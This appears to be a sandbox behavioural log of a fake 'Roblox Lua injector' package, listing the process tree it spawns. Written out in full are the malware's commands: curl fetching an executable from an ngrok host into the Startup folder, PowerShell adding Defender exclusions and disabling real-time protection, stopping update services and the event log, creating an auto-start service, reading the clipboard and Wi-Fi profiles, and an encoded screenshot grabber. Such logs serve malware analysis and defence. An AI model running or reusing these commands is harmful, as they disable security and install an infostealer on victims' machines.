C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1864,12873339892837905768,583093436849244274,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1876 /prefetch:22⤵PID:1556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1864,12873339892837905768,583093436849244274,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2348 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:548
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1864,12873339892837905768,583093436849244274,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2600 /prefetch:82⤵PID:428
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,12873339892837905768,583093436849244274,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3180 /prefetch:12⤵PID:4488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,12873339892837905768,583093436849244274,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3188 /prefetch:12⤵PID:4128
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1864,12873339892837905768,583093436849244274,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5052 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1696
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,12873339892837905768,583093436849244274,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3796 /prefetch:12⤵PID:4468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1864,12873339892837905768,583093436849244274,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5884 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1876
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,12873339892837905768,583093436849244274,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:12⤵PID:4012
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,12873339892837905768,583093436849244274,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4968 /prefetch:12⤵PID:3376
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,12873339892837905768,583093436849244274,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4848 /prefetch:12⤵PID:1364
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,12873339892837905768,583093436849244274,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5868 /prefetch:12⤵PID:5016
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,12873339892837905768,583093436849244274,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4940 /prefetch:12⤵PID:3440
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1864,12873339892837905768,583093436849244274,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1640 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:2292
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,12873339892837905768,583093436849244274,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4848 /prefetch:12⤵PID:1044
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,12873339892837905768,583093436849244274,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5008 /prefetch:12⤵PID:1936
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,12873339892837905768,583093436849244274,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6232 /prefetch:12⤵PID:1860
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:932
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3900
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2536
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Roblox-Lua-Injector-main\Start.bat" "1⤵PID:1928
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w hidden -c Add-MpPreference -ExclusionPath ""2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1560
-
-
C:\Windows\system32\curl.execurl --silent --output "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Built.exe" "https://raptor-stirring-nationally.ngrok-free.app/Update.exe"2⤵
- Drops startup file
PID:4080
-
-
C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.42251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exepython --version2⤵PID:2344
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Roblox-Lua-Injector-main\Start.bat" "1⤵PID:1700
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w hidden -c Add-MpPreference -ExclusionPath ""2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3324
-
-
C:\Windows\system32\curl.execurl --silent --output "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Built.exe" "https://raptor-stirring-nationally.ngrok-free.app/Update.exe"2⤵
- Drops startup file
PID:1828
-
-
C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.42251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exepython --version2⤵PID:4380
-
-
C:\Users\Admin\Desktop\Roblox-Lua-Injector-main\Bootstrapper.exe"C:\Users\Admin\Desktop\Roblox-Lua-Injector-main\Bootstrapper.exe"1⤵PID:3372
-
C:\Users\Admin\Desktop\Roblox-Lua-Injector-main\Bootstrapper.exe"C:\Users\Admin\Desktop\Roblox-Lua-Injector-main\Bootstrapper.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
PID:1320 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Roblox-Lua-Injector-main\Bootstrapper.exe'"3⤵PID:3080
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Roblox-Lua-Injector-main\Bootstrapper.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1088
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵PID:1360
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4120
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"3⤵PID:1892
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3020
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "start bound.exe"3⤵PID:2396
-
C:\Users\Admin\AppData\Local\Temp\bound.exebound.exe4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:488 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3632
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart5⤵PID:3328
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart6⤵PID:4368
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc5⤵
- Launches sc.exe
PID:4208
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc5⤵
- Launches sc.exe
PID:4900
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv5⤵
- Launches sc.exe
PID:1476
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits5⤵
- Launches sc.exe
PID:5952
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc5⤵
- Launches sc.exe
PID:4540
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 05⤵
- Power Settings
PID:5672
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 05⤵
- Power Settings
PID:5664
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 05⤵
- Power Settings
PID:2912
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 05⤵
- Power Settings
PID:5760
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "QLLZSZLP"5⤵
- Launches sc.exe
PID:4164
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "QLLZSZLP" binpath= "C:\ProgramData\ptguvtswbjga\arihotnjnjhl.exe" start= "auto"5⤵
- Launches sc.exe
PID:864
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog5⤵
- Launches sc.exe
PID:4688
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "QLLZSZLP"5⤵
- Launches sc.exe
PID:6132
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵PID:2380
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4032
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:760
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4668
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:4784
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2804
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵PID:2824
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3328
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:3900 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5608
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:1040
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5716
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:4208
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:5640
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:1828 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5740
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:5236
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:5828
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵PID:5268
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:5920
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵PID:5320
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAA